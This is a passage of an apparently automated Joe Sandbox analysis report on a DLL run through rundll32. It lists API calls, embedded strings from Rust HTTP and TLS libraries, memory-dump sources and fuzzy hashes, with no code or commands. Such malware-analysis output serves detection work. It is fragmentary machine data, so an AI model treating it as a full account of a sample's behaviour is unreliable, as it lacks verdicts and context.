                              • connect.WS2_32(?,6CC38577,0C7502F8), ref: 6CC476C6
                              • GetLastError.KERNEL32 ref: 6CC476D0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLastconnect
                              • String ID:
                              • API String ID: 374722065-0
                              APIs
                              • RegCloseKey.ADVAPI32(80000001,04DB6E1A), ref: 04DB6E49
                              • RegCloseKey.ADVAPI32(000008CC), ref: 04DB6E52
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,6CCB5F8C,6CCB5F64), ref: 6CC02202
                              • memmove.VCRUNTIME140(?,?,00000110,?,?,?,?,?,6CCB5F8C,6CCB5F64), ref: 6CC0222D
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              APIs
                              • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000000,?,?,6CC11D27,6CCB58B1), ref: 6CC0C99B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: QueryValue
                              • String ID:
                              • API String ID: 3660427363-0
                              APIs
                              • SetThreadStackGuarantee.KERNEL32(?), ref: 6CC4FC1B
                                • Part of subcall function 6CBC5AD0: RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FreeGuaranteeHeapStackThread
                              • String ID:
                              • API String ID: 4181682901-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: closesocket
                              • String ID:
                              • API String ID: 2781271927-0
                              APIs
                              • QueryContextAttributesW.SECUR32(?,00000053,?,00000000,?,6CC36E29), ref: 6CC472BC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AttributesContextQuery
                              • String ID:
                              • API String ID: 1320229847-0
                              APIs
                              • RtlAllocateHeap.NTDLL(02870000,00000000,?,?,6CBC5AAF,?,00000004,6CBCE4B2,?,6CC4682F,?,?,?,?,6CC465EB,00000002), ref: 6CC5011F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              APIs
                              • RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              APIs
                              • RegCloseKey.KERNEL32(?,6CC11DC5), ref: 6CC609A0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              APIs
                              • memmove.VCRUNTIME140(?,?,000001C8), ref: 6CC1BD37
                                • Part of subcall function 6CC50110: RtlAllocateHeap.NTDLL(02870000,00000000,?,?,6CBC5AAF,?,00000004,6CBCE4B2,?,6CC4682F,?,?,?,?,6CC465EB,00000002), ref: 6CC5011F
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC2286F, 6CC22905
                              • PRI * HTTP/2.0SM, xrefs: 6CC1C4DB
                              • invalid SETTINGS frame, xrefs: 6CC1C960
                              • assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs, xrefs: 6CC227AC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocateHeapmemmove
                              • String ID: PRI * HTTP/2.0SM$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs$called `Result::unwrap()` on an `Err` value$invalid SETTINGS frame
                              • API String ID: 3274069717-2943561727
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000138), ref: 6CC3BD79
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC3D4BE
                              • memmove.VCRUNTIME140(?,?,000000C0,6CCB654C), ref: 6CC3D52B
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC3D587
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC3D5A8
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC3D5E6
                              Strings
                              • invalid minimum TLS version for backendinvalid maximum TLS version for backendvalid request parts, xrefs: 6CC3C645
                              • NO_PROXYno_proxy[, xrefs: 6CC3BE37
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: NO_PROXYno_proxy[$invalid minimum TLS version for backendinvalid maximum TLS version for backendvalid request parts
                              • API String ID: 2162964266-2564500342
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: $/1.1$/1.1$E$HTTP$PRI * HTTP/2.0SM$close
                              • API String ID: 0-737735271
                              APIs
                              • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDC209
                                • Part of subcall function 6CBC5AD0: RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CBDC247
                              • memmove.VCRUNTIME140(?,?,00000088), ref: 6CBDC2BF
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDC470
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDCBA8
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBDCC09
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBDCC3F
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDCC6E
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDCCB8
                              • memmove.VCRUNTIME140(?,?,0000007E,?), ref: 6CBDCD12
                              • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBDCD3B
                              • memmove.VCRUNTIME140(?,?,00000088), ref: 6CBDCD65
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$FreeHeap
                              • String ID:
                              • API String ID: 3670176668-0
                              APIs
                              • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC4840A
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC48255), ref: 6CC48419
                              • GetConsoleMode.KERNEL32(00000000,?), ref: 6CC48457
                              • NtWriteFile.NTDLL ref: 6CC484DD
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC484ED
                              • RtlNtStatusToDosError.NTDLL ref: 6CC4857A
                              • CloseHandle.KERNEL32(00000000), ref: 6CC4876A
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC4871C
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorHandle$CloseConsoleFileLastModeObjectSingleStatusWaitWrite
                              • String ID: called `Result::unwrap()` on an `Err` value
                              • API String ID: 3090192319-2333694755
                              APIs
                              • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 6CC527D3
                              Strings
                              • main, xrefs: 6CC52934
                              • <unnamed>, xrefs: 6CC526A8, 6CC52870
                              • Box<dyn Any>aborting due to panic at , xrefs: 6CC52848
                              • full, xrefs: 6CC52892
                              • RUST_BACKTRACEentity not foundpermission deniedconnection refusedconnection resethost unreachablenetwork unreachableconnection abortednot connectedaddress in useaddress not availablenetwork downbroken pipeentity already existsoperation would blocknot a directo, xrefs: 6CC525FE
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressSingleWake
                              • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $RUST_BACKTRACEentity not foundpermission deniedconnection refusedconnection resethost unreachablenetwork unreachableconnection abortednot connectedaddress in useaddress not availablenetwork downbroken pipeentity already existsoperation would blocknot a directo$full$main
                              • API String ID: 3114109732-636500360
                              • Opcode ID: 18a69fba6b3f9b0328a053db75d8c88144fa202a2bad4555d59a66ca89891050
                              • Instruction ID: 9c1c845f8040012b5833ab91ac6bccbb07816a20857d3170782db1d24e8002b2
                              • Opcode Fuzzy Hash: 18a69fba6b3f9b0328a053db75d8c88144fa202a2bad4555d59a66ca89891050
                              • Instruction Fuzzy Hash: 12228CB0600B408FD721CF25C0A8B52B7F1BB45308F54896EC99A8BF91E735F569CB95
                              APIs
                              • memset.VCRUNTIME140(?,00000000,00001000), ref: 6CC49F8A
                              • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 6CC49FA6
                              • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00000800,00000000), ref: 6CC49FD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: FormatHandleMessageModulememset
                              • String ID: NTDLL.DLL
                              • API String ID: 2302251862-1613819793
                              • Opcode ID: bed357937c64d7120d626d6fa2bb860a74b5ee79902bb33e89e3273597c53303
                              • Instruction ID: 078ec0397323cc05781585862053380b76fe61fb8e8b4213fb8cc8ecfed2e854
                              • Opcode Fuzzy Hash: bed357937c64d7120d626d6fa2bb860a74b5ee79902bb33e89e3273597c53303
                              • Instruction Fuzzy Hash: BAD1CE72E052588FEB10CFD5C8803EDBBB2FB85314F248239D415ABB85E3759945CB50
                              Strings
                              • {invalid syntax}{recursion limit reached}?'for<> ::{closureshim# as mut const ; dyn + unsafe extern ", xrefs: 6CC43E6D
                              • `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6CC458EA
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC4620A
                              • ,(><&*@, xrefs: 6CC45F79, 6CC46183
                              • SizeLimitExhausted, xrefs: 6CC462EB
                              • .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs, xrefs: 6CC44DAD
                              • .%2e%2E, xrefs: 6CC45C5E, 6CC46134
                              • __ZN, xrefs: 6CC451F5
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: ,(><&*@$.%2e%2E$.llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Result::unwrap()` on an `Err` value${invalid syntax}{recursion limit reached}?'for<> ::{closureshim# as mut const ; dyn + unsafe extern "
                              • API String ID: 0-3150708015
                              • Opcode ID: 15d19370c072ee85e9d3a94b7e6a5359ef12bc896c1aa73cee99171af5e5313e
                              • Instruction ID: 5fb668383d7973513920bbab53263338cb261c870045008c888c5489311994b1
                              • Opcode Fuzzy Hash: 15d19370c072ee85e9d3a94b7e6a5359ef12bc896c1aa73cee99171af5e5313e
                              • Instruction Fuzzy Hash: EC02D275E056158FDB14CF99C4807ADB7B1BF89314F2CC269D869ABB81E331AC42CB91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: swprintf$_memset
                              • String ID: :$@
                              • API String ID: 1292703666-1367939426
                              • Opcode ID: 26546824efc929cea88a5a0cbe0ce2705dc845ce85ea236ce426ff3fea3cd6f8
                              • Instruction ID: c1ace1bf4917af14e60facaed9055c0548041db24b6bf20cea9cfdc883f22333
                              • Opcode Fuzzy Hash: 26546824efc929cea88a5a0cbe0ce2705dc845ce85ea236ce426ff3fea3cd6f8
                              • Instruction Fuzzy Hash: 93313CB6D0021CABEB04CBE8CC95FEEB7B9FB88304F50421DE906A7240E6706945CB94
                              Strings
                              • pool is disabledBadScheme, xrefs: 6CC034FB
                              • request has been canceled, xrefs: 6CC02D85
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC038B6
                              • assertion failed: Pin::new(&mut rx).poll(cx).is_pending(), xrefs: 6CC038DC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: assertion failed: Pin::new(&mut rx).poll(cx).is_pending()$called `Result::unwrap()` on an `Err` value$pool is disabledBadScheme$request has been canceled
                              • API String ID: 0-3394898113
                              • Opcode ID: e5f21d1acd1a833b1cb1d74d3ad0d9ffc4f7df7e3be1cd0618ab2d0d24d0706b
                              • Instruction ID: e3a234ae9323c9b7ac9cdb367121528fb5b4ddafc94d58666167cedb6259df91
                              • Opcode Fuzzy Hash: e5f21d1acd1a833b1cb1d74d3ad0d9ffc4f7df7e3be1cd0618ab2d0d24d0706b
                              • Instruction Fuzzy Hash: 98724D35A09B818FC721CF29C480A9BF7F1BFCA344F148A5DE8895B651EB719985CB42
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$__aulldiv
                              • String ID:
                              • API String ID: 3540790784-0
                              • Opcode ID: fb4fb7b8f6ae6604e73de285de927d9d7cb11869837114320e07f3c3780b15ef
                              • Instruction ID: 801b72f5fa97dcaa7dc2b63dda965dcc9f9a49f63c7f684f6ddbf126ef3b9257
                              • Opcode Fuzzy Hash: fb4fb7b8f6ae6604e73de285de927d9d7cb11869837114320e07f3c3780b15ef
                              • Instruction Fuzzy Hash: 6F32AD326083559FC714CF58C880A5EB7E2EFC9754F198A2DE8999B391E771EC05CB82
                              APIs
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,6CC4859F,?,00001000,?,?,6CC48025,?,6CC4859F,?,?), ref: 6CC487F9
                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000,?,6CC4859F), ref: 6CC48829
                              • WriteConsoleW.KERNEL32(?,?,00000001,6CC4859F,00000000,?,6CC4859F), ref: 6CC4887A
                              • GetLastError.KERNEL32(?,6CC4859F), ref: 6CC48AA3
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                              • String ID:
                              • API String ID: 3036337926-0
                              • Opcode ID: db323ecd82f27da4e537c380d7bc3afbf127da98c060fcd8598f2f43ac221114
                              • Instruction ID: ddd3b9c541167bbea0f895f201855ec07c32f1514ad79e8763b6193def1d8efe
                              • Opcode Fuzzy Hash: db323ecd82f27da4e537c380d7bc3afbf127da98c060fcd8598f2f43ac221114
                              • Instruction Fuzzy Hash: E8A13930A24B915EE7028B3AC441B76B7B4BFD2348F14C72AF9C4B3D81FB7195858285
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: \u$\u${${$}$}
                              • API String ID: 0-582841131
                              • Opcode ID: 3846177a69292b2e2f262e23b0c518f0eb7641cd153b4d63e2ecac50257bd956
                              • Instruction ID: 77fe802c8db79a9e611642844f0651a8daea12b7ce6b5a00d955602af7541e64
                              • Opcode Fuzzy Hash: 3846177a69292b2e2f262e23b0c518f0eb7641cd153b4d63e2ecac50257bd956
                              • Instruction Fuzzy Hash: B551D823E0DBDA86C7018BA944102DEBFF29FE6214F1D81DAC4D81F782C3765685D3A6
                              APIs
                                • Part of subcall function 6CC39B05: memset.VCRUNTIME140(00000000,00000000,?,?,?,?,6CC3985C), ref: 6CC39B28
                              • DecryptMessage.SECUR32(?,?,00000000,00000000), ref: 6CC39955
                                • Part of subcall function 6CBE885A: memmove.VCRUNTIME140(?,?,?,?,?,?,6CBEC2F6,?,?,6CC3460C,?,6CC3463F), ref: 6CBE8883
                                • Part of subcall function 6CC46438: memmove.VCRUNTIME140(?,HTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: ,?,?,00000002,?,?,?,6CC250BB,00000019), ref: 6CC464C5
                              Strings
                              • assertion failed: pos <= self.dec_in.get_ref().len() as u64, xrefs: 6CC39AF6
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
